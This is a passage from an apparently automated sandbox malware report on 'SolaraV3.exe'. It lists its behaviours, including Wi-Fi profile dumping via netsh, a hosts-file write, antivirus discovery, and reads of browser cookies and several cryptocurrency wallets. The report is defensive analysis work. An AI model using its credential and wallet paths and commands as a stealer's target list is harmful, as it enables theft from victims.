              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC70D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00007FF6DC70D010
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC725E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,1_2_00007FF6DC725E7C
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEB48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,110_2_00007FF74EEB48CC
              Source: C:\Users\user\Desktop\SolaraV3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Users\user\Desktop\SolaraV3.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: EthereumZ
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystoreZ
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeFile read: C:\Users\user\AppData\Local\Temp\ ?? ? \Credentials\Chrome\Chrome Cookies.txt
              Source: Yara matchFile source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 2_2_00007FFB0B812B62 bind,WSAGetLastError,2_2_00007FFB0B812B62
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              File and Directory Permissions Modification
              1
